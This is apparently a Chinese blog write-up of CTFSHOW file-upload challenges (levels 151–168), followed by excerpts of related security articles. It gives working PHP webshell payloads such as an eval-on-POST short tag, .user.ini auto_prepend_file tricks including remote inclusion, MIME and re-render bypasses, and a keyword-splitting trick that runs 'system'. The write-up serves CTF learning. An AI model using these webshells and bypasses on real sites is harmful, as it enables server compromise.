代码编织梦想

知识点:

1.文件上传--前端验证(如果是纯前端验证,那么我们可以直接检查元素修改代码即可绕过上传)

2.文件上传-黑白名单(意思就是网站设立黑白名单,允许上传什么类型文件等)

3.文件上传-.user.ini的妙用

4.文件上传-PHP语言特性

本文分享全部基于PHP的语言

详细点:

1.检测层面:前端,后端等

2.检测内容:文件头,完成性,二次渲染等

3.检测后缀:黑名单,白名单、MIME检测等

4.绕过技巧:多后缀解析,截断,中间件特性,条件竞争等

前置知识点:这里给大家说明一个问题,因为我在学的时候也思考很久。假如我们上传后门代码需要用特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外),如:我们上传后门文件格式为jpg,图片里边有后门代码,不能被触发,所以连接不上后门。

案例演示:CTFSHOW--文件上传

151:改关卡为纯前端验证,查看源代码允许上传png格式,我们直接修改为PHP后,直接上传php后门代码成功。

152:同上操作后提示文件类型不合规,我们简单抓包发现MIME检测,直接修改Content-Type: image/png,成功上传。

153:js验证+.user.ini

.user.ini不过多介绍自行百度,我们上传.user.ini文件,内容为auto_prepend_file=test.png,这句话什么意思呢?说白了这是将test.png当作代码执行,正如前期所说直接上传png图片后门是不会执行的,但是这里我们用到.user.ini后就能将图片后门当作代码执行。

154-155:js验证+.user.ini+短标签

我们知道php代码都有<?php?>这样的格式,那么不加标签要怎么运行php呢(因为过滤的php关键字段,我们不能写完整的代码,就得用到短标签绕过)

<? echo '123';?>                                             //前提是开启配置参数short_open_tags=on

<?=(表达式)?>                                               //不需要开启参数设置

<% echo '123';%>                                          //前提是开启配置参数asp_tags=on

<script language=”php”>echo '1'; </script>   //不需要修改参数开关

步骤:同上+短标签

.user.ini:auto_prepend_file=test.png

test.png:<?=eval($_POST[x]);?>

163 突破上传删除

过滤 . () {} ;等 同时文件被删除

直接利用.user.ini包含远程

auto_prepend_file=http://794750069/

auto_prepend_file=http://794750069/

解题方法:条件竞争可以解题但是这关不需要用到条件竞争。(当上传什么文件都删除时才用到条件竞争),条件竞争是没上传之前一直发包确保在上传成功后,在服务器没有删除之前访问到。

文件二次渲染:

1、判断上传前和上传后的文件大小及内容

2、判断上传后的文件返回数据包内容

164 png二次渲染(以后经常碰到的情况):意思就是上传的图片被网站加工处理,会把里边的代码进行修改,这就是二次渲染。

文件上传之二次渲染绕过_qq_40800734的博客-CSDN博客_图片二次渲染    (该网站是利用代码脚本生成渲染图片后门的,手工也可以自己生成但是有难度。但是脚本代码生成的图片也不是一定可以)

get 0=system

post 1=tac flag.php

168 免杀后门

<?php $a='syste';$b='m';$c=$a.$b;$c('tac ../flagaa.php');?>

这题是写不进去,当我们上传关键代码时会直接被删除(或者可以说写不进去),解决办法就是我们直接把关键的代码进行分割。

上传成功后直接访问该目录即可

 

 文件上传还有很多配合中间件的解析漏洞上传的,这里不再过多介绍。

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68243135/article/details/127900339

文件上传漏洞---web渗透学习_analy_lee的博客-爱代码爱编程

文件上传本身是一个系统的正常需求,但是由于开发人员在开发时欠缺相关的安全知识,在对用户文件上传部分的控制不足或者缺陷,而导致用户越过其本身权限向服务器上传可执行的动态脚本文件。 这里上传的文件可以是木马,病毒、恶意脚本或we

web安全-上传漏洞-fck编辑器利用_coisini、的博客-爱代码爱编程_fck综合利用工具

本节工具: FCK编辑器漏洞综合利用工具 Burpsuite抓包工具BurpSuite破解版及安装教程 FCK编辑器(FCKEditor 富文本编辑器) FCKeditor简介 FCKeditor是一个专门使用在网页

php安全---文件包含漏洞_暮秋初九的博客-爱代码爱编程

原理就是注入一段用户能控制的脚本或代码,并在服务器端执行。 常见的导致文件包含的函数如下: PHP: include(), include—once(),require(), require_once(), fopen(),

Web安全-泛微相关系统-历史漏洞-爱代码爱编程

2019年 泛微e-cology OA数据库配置信息泄漏 包括不限于8.0、9.0版本 /mobile/dbconfigreader.jsp 2019年 泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc) 2019年 泛微e-cology OA系统远程代码执行 0x02 影响范围 包括但不限于7.0,8.0,8.1 /wea

超级CMS2.39-文件上传漏洞-爱代码爱编程

超级CMS2.39-文件上传漏洞 环境搭建漏洞复现上传点一上传点二上传点三漏洞分析 环境搭建 下载超级CMS V2.39,下载地址使用phpstudy搭建web环境把下载好的源码放到网站根目录下,开启phpstudy,浏览器访问安装后即可 漏洞复现 上传点一 上传点二 上传点三 漏洞分析 存在漏洞的位置fi

快排CMS-文件上传漏洞-爱代码爱编程

快排CMS-文件上传漏洞 环境搭建漏洞复现漏洞点一漏洞点二漏洞点三漏洞点四漏洞点五漏洞点六漏洞分析 环境搭建 下载快排cms,下载地址使用phpstudy搭建web环境把下载好的源码放到网站根目录下,开启phpstudy,浏览器访问安装后即可 漏洞复现 漏洞点一 漏洞点二 漏洞点三 漏洞点四 漏洞点五

upload-labs通关(Pass-11~Pass-15)-爱代码爱编程

目录 Pass-11 Pass-12 Pass-13 Pass-14 Pass-15 Pass-11 什么鬼,我都做好了上传不成功的准备,结果sh.php居然上传成功了。 一看Response报文,果然事情没有这么简单,后端自动把文件名中的php去掉了,文件名变成sh.了 这样的话,盲猜可以用双写绕过。这关直接在repeater中试一

从攻击中学习防御之S-CMS医院建站系统XXE通用漏洞的利用与防御-爱代码爱编程

文章目录 一、什么是XXE?二、XXE漏洞复现三、XXE漏洞的防御和修复建议 本文针对S-CMS医院建站系统进行了代码审计,发现了多处SQL注入漏洞及XXE漏洞,限于个人的精力有限,这里仅针对weixin/index.php文件中存在的XXE漏洞进行漏洞挖掘与利用,并在文末提出针对此漏洞的防御方法。 一、什么是XXE? XML外部实体注入(

文件上传漏洞详解-以upload-labs-master靶场为例-爱代码爱编程

渗透测试自学日志,目前复习到文件上传。 免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; 文件上传的原理 在 Web 中进行文件上传是通过将表单设为 multipa

web攻防-通用漏洞&sql注入-sqlmap基本使用&墨者靶场_@墨竹的博客-爱代码爱编程

目录 知识点 SQLMAP -什么是SQLMAP? -它支持那些数据库注入? -它支持那些SQL注入模式? -它支持那些其他不一样功能? -使用SQLMAP一般注入流程分析? SQL注入类型: 案例演示 SQL注入-墨者-SQL手工注入漏洞测试(Db2数据库)  SQL注入-墨者-SQL手工注入漏洞测试(SQLite数据库) 其

web漏洞-爱代码爱编程

目录 1.Sql注入 2.Xml注入(xml实体注入,XXE) 3.远程文件包含漏洞 4.本地文件包含漏洞 5.命令注入漏洞 1.Sql注入 1.概念 1.SQL注入是一种Web应用代码中的漏洞。 2.黑客可以构造特殊数据库请求,使Web应用执行带有附加条件的SQL语句   用户请求中使用了带有参数的值,但是没有进行任何过滤   

web攻防-爱代码爱编程

目录 知识点 详细点 文件二次渲染 php删除规则 例题 CTF-Web入门-162 CTF-Web入门-163 CTF-Web入门-164 CTF-Web入门-165 CTF-Web入门-166 CTF-Web入门-167 CTF-Web入门-168 CTF-Web入门-169-170 知识点 1、文件上传-二次

web攻防-爱代码爱编程

目录 知识点 1、文件上传-前端验证 2、文件上传-黑白名单 3、文件上传-user.ini妙用 4、文件上传-PHP语言特性 详细介绍 1、检测层面:前端,后端等 2、检测内容:文件头,完整性,二次渲染等 3、检测后缀:黑名单,白名单,MIME检测等 4、绕过技巧 5、前置知识 案例演示-CTFSHOW-文件上传-151到16